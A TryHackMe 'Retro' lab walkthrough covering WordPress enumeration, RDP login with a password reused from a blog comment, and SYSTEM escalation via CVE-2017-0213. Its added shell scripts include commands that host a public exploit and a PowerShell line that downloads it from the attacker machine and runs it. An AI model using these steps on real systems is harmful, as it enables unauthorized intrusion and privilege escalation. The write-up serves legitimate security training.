CTF Walkthroughs, TryHackMe

TryHackMe – Retro Walkthrough

Introduction

This was a Windows machine that required enumerating a WordPress instance to identify user credentials, authenticating remotely via RDP, and exploiting a Windows COM vulnerability to escalate privileges to SYSTEM.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1,000 most common ports (Nmap's default port selection), using the following flags:

  • -sC to run the default NSE scripts
  • -sV to enumerate service and application versions

The scan revealed two open ports: 80 (HTTP) and 3389 (RDP). RDP is only useful once credentials are available, which means HTTP is probably the best way forward.
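The scan and the port triage as a small script (an added example, not the commands or output from the original post; the target IP is the one used in this walkthrough, while the output file name and the sample greppable line are constructed here):

```shell
#!/bin/sh
# Added example, not the commands from the original post: the Nmap scan described
# above, saved in greppable form, plus a parser that turns that output into the
# list of open ports and the triage note the post draws from it.
# Assumptions: the target IP is the one the post uses; the output file name and
# the sample greppable line below are constructed for this example.

TARGET="${TARGET:-10.10.251.237}"
OUT="${OUT:-retro_top1000}"

# The scan from the post: -sC runs the default NSE scripts, -sV probes service
# versions. Nmap's default port selection is already the 1,000 most common
# TCP ports, so no -p/--top-ports argument is needed. -oA writes .nmap, .xml
# and .gnmap files; the .gnmap (greppable) one is what open_ports() reads.
scan_target() {
    nmap -sC -sV -oA "$OUT" "$TARGET"
}

# Read greppable (-oG) output on stdin and print each open port on its own line.
# Each entry has the form port/state/proto/owner/service/rpcinfo/version/ and
# entries are separated by "/, ", so splitting on that delimiter keeps a comma
# inside a version banner from breaking the parse. Only state "open" is kept;
# "open|filtered" entries are deliberately left out.
open_ports() {
    awk -F'Ports: ' '/Ports: / {
        n = split($2, entry, /\/, /)
        for (i = 1; i <= n; i++) {
            split(entry[i], f, "/")
            if (f[2] == "open") print f[1]
        }
    }'
}

# Map each open port to the next enumeration step, mirroring the reasoning in
# the post: with only 80 and 3389 open, the web service is the way in and RDP
# only becomes useful once credentials turn up.
triage() {
    while IFS= read -r port; do
        case "$port" in
            80|443|8080|8443) echo "$port: web service - brute-force paths, fingerprint the app" ;;
            3389)             echo "$port: RDP - hold until credentials are found" ;;
            *)                echo "$port: inspect manually" ;;
        esac
    done
}

# Constructed sample of one greppable host line (not real scan output): a
# filtered port is included to show that only "open" entries are reported.
SAMPLE_GNMAP=$(printf 'Host: 10.10.251.237 ()\tPorts: 22/filtered/tcp//ssh///, 80/open/tcp//http///, 3389/open/tcp//ms-wbt-server///\tIgnored State: filtered (997)')

case "${1:-}" in
    scan)   scan_target ;;
    ports)  open_ports < "${2:-$OUT.gnmap}" | triage ;;
    sample) printf '%s\n' "$SAMPLE_GNMAP" | open_ports | triage ;;
    *)      : ;;   # no argument: just define the functions (e.g. when sourced)
esac
```

Run `sh scan.sh scan` against the box, then `sh scan.sh ports` to triage the saved .gnmap file; `sh scan.sh sample` exercises the parser on the constructed line without touching the network.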

Enumerating HTTP

The next step is to run a scan to find hidden files and directories using Gobuster, with the following flags:

  • dir to run Gobuster in directory and file brute-forcing mode
  • -u to specify the target URL
  • -w to specify the wordlist to use
  • -x to specify the file extensions to append to each word
  • -t to specify the number of concurrent threads

Navigating to the /retro directory found by Gobuster reveals a WordPress installation:

Running WPScan against the target with the following flags identifies a “wade” user:

  • --url to specify the URL of the WordPress application, in this case http://10.10.251.237/retro
  • -e to specify the elements to enumerate, in this case ap for all plugins, at for all themes, tt for timthumbs, cb for config backups, dbe for database exports, u for users and m for media
  • --plugins-detection aggressive to detect plugins aggressively (many more requests, so slower and noisier, but fewer misses)

It appears that Wade has published a post on the WordPress site:

And a comment on that post contains what looks like a password:

As it turns out, the password from the comment is also the Windows password of the “wade” account on the machine (password reuse between the blog and the host). Authenticating remotely via RDP using FreeRDP:
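The web enumeration and foothold steps above as shell functions, with a parser for the usernames WPScan reports (an added example, not the commands or output from the original post; the target IP and /retro path are from this walkthrough, while the wordlist, extensions, thread count, output files, xfreerdp options and the WPScan excerpt are assumptions and constructed samples):

```shell
#!/bin/sh
# Added example, not the commands from the original post: the web enumeration
# and foothold steps above as shell functions, plus a parser that pulls the
# identified usernames out of WPScan's text output.
# Assumptions: target IP and the /retro path come from the post; the wordlist,
# extensions, thread count, output file names and the xfreerdp options are
# choices made here, and the WPScan output below is a constructed sample.

TARGET="${TARGET:-10.10.251.237}"
WORDLIST="${WORDLIST:-/usr/share/wordlists/dirb/common.txt}"

# Gobuster with the flags the post lists: dir mode, -u target, -w wordlist,
# -x extensions, -t threads. Results are also saved to a file with -o.
brute_dirs() {
    gobuster dir -u "http://$TARGET/" -w "$WORDLIST" -x php,txt,html -t 50 -o gobuster_root.txt
}

# WPScan with the flags the post lists. The -e choices are comma-separated in
# one argument; "u" enumerates users, which is what produced "wade". Aggressive
# plugin detection sends far more requests, so expect it to be slow and noisy.
wpscan_enum() {
    wpscan --url "http://$TARGET/retro" \
        -e ap,at,tt,cb,dbe,u,m \
        --plugins-detection aggressive \
        -o wpscan_retro.txt
}

# Extract usernames from WPScan text output read on stdin. A user entry is a
# "[+] name" line inside the "User(s) Identified:" section that is immediately
# followed by a " | Found By:" line; requiring that follow-up line keeps other
# "[+]" status lines (e.g. "[+] Finished:") from being reported as users.
wp_users() {
    awk '
        /User\(s\) Identified:/ { inusers = 1; next }
        !inusers                { next }
        /^\[\+\] /              { cand = $0; sub(/^\[\+\] /, "", cand); next }
        /^ \| Found By:/        { if (cand != "") print cand }
                                { cand = "" }
    '
}

# RDP with FreeRDP using a recovered username and password. The password is
# never hard-coded here because the post does not reproduce the comment's value.
rdp_login() {
    xfreerdp /v:"$TARGET" /u:"$1" /p:"$2" /cert:ignore +clipboard /dynamic-resolution
}

# Constructed WPScan excerpt (not real tool output) showing the section layout.
SAMPLE_WPSCAN=$(cat <<'EOF'
[+] URL: http://10.10.251.237/retro/ [10.10.251.237]

[i] User(s) Identified:

[+] wade
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Finished: Sun Jan  1 00:00:00 2023
EOF
)

case "${1:-}" in
    dirs)   brute_dirs ;;
    wpscan) wpscan_enum ;;
    users)  wp_users < "${2:-wpscan_retro.txt}" ;;
    rdp)    rdp_login "${2:?username}" "${3:?password}" ;;
    *)      : ;;   # no argument: just define the functions
esac
```

Typical order is `sh web.sh dirs`, `sh web.sh wpscan`, then `sh web.sh users` to list the accounts worth trying, and finally `sh web.sh rdp wade '<password from the comment>'` once the comment has been read.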

Privilege Escalation

Enumerating system information to identify the operating system, its version/build and any installed hotfixes:

This specific build of Windows 10 is affected by CVE-2017-0213, an elevation-of-privilege vulnerability in the Windows COM Aggregate Marshaler (a user-mode bug, even though it is commonly listed next to kernel exploits), as referenced in PayloadsAllTheThings:

This GitHub repository contains a compiled executable that exploits the vulnerability:

The “Affected Products” section of the repository also confirms that the build the box is running is vulnerable:

Downloading the archive containing the exploit and decompressing it, then starting Python's built-in HTTP server to host it:

Transferring the exploit to the target machine using the PowerShell Invoke-WebRequest cmdlet:

The request is received by the HTTP server on the attacking machine:

Executing the exploit on the target machine:

Upon execution, the exploit has spawned a new CMD shell as SYSTEM:
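Helpers for the privilege escalation steps above (an added example, not the commands from the original post): a parser for the systeminfo fields compared against the repository's “Affected Products” list, the hosting step, and the Invoke-WebRequest line for the target. The attacker address, port and archive/binary names are placeholders, since the post names neither the repository nor the files, and the systeminfo text is a constructed sample.

```shell
#!/bin/sh
# Added example, not from the original post: helpers for the privilege
# escalation steps above. It parses a pasted `systeminfo` dump for the fields
# the post compares against the repository's "Affected Products" list, hosts
# the unpacked exploit archive with Python's built-in HTTP server, and prints
# the Invoke-WebRequest line to paste into the RDP session.
# Assumptions: ATTACKER, PORT and the archive/binary names are placeholders
# (the post names neither the repository nor the files); the systeminfo text
# is a constructed sample, and nothing here decides whether a build is
# vulnerable - that comparison stays manual, as in the post.

ATTACKER="${ATTACKER:-10.9.0.1}"            # assumed VPN address of the attacking host
PORT="${PORT:-8000}"
EXPLOIT_ZIP="${EXPLOIT_ZIP:-exploit.zip}"   # placeholder release archive name
EXPLOIT_EXE="${EXPLOIT_EXE:-exploit.exe}"   # placeholder binary inside it

# OS version/build line from a systeminfo dump on stdin (e.g. saved from the
# RDP session's clipboard).
os_build() {
    sed -n 's/^OS Version:[[:space:]]*//p'
}

# Installed hotfix KB numbers from the same dump, one per line, deduplicated.
# Check these against the KB that patched the CVE before trusting a build match.
hotfixes() {
    grep -o 'KB[0-9]\{6,7\}' | sort -u
}

# Unpack the downloaded archive next to this script and serve that directory.
serve_exploit() {
    dir="$(basename "$EXPLOIT_ZIP" .zip)"
    mkdir -p "$dir" && unzip -o -q "$EXPLOIT_ZIP" -d "$dir"
    ( cd "$dir" && python3 -m http.server "$PORT" )
}

# The PowerShell line for the target: download the binary into %TEMP% with
# Invoke-WebRequest and run it from the RDP session's PowerShell window.
target_command() {
    printf 'Invoke-WebRequest -Uri http://%s:%s/%s -OutFile $env:TEMP\\%s; & $env:TEMP\\%s\n' \
        "$ATTACKER" "$PORT" "$EXPLOIT_EXE" "$EXPLOIT_EXE" "$EXPLOIT_EXE"
}

# Constructed systeminfo excerpt (illustrative values, not the box's).
SAMPLE_SYSTEMINFO=$(cat <<'EOF'
Host Name:                 WIN-SAMPLE
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.14393 N/A Build 14393
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB3192137
                           [02]: KB3199986
EOF
)

case "${1:-}" in
    sysinfo) os_build < "${2:?systeminfo dump}"; hotfixes < "$2" ;;
    serve)   serve_exploit ;;
    cmd)     target_command ;;
    *)       : ;;   # no argument: just define the functions
esac
```

Save the systeminfo output to a file and run `sh privesc.sh sysinfo sysinfo.txt` to get the build and KB list to compare by hand; `sh privesc.sh serve` hosts the unpacked archive, and `sh privesc.sh cmd` prints the line to paste on the target.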

Conclusion

Even though the exploitation part of this box was quite trivial and the privilege escalation was done with a public exploit for a known vulnerability, I still enjoyed it, as finding the right exploit did require some research: automated enumeration tools come back with a lot of false positives (suggested exploits that do not actually apply to the installed build and hotfixes).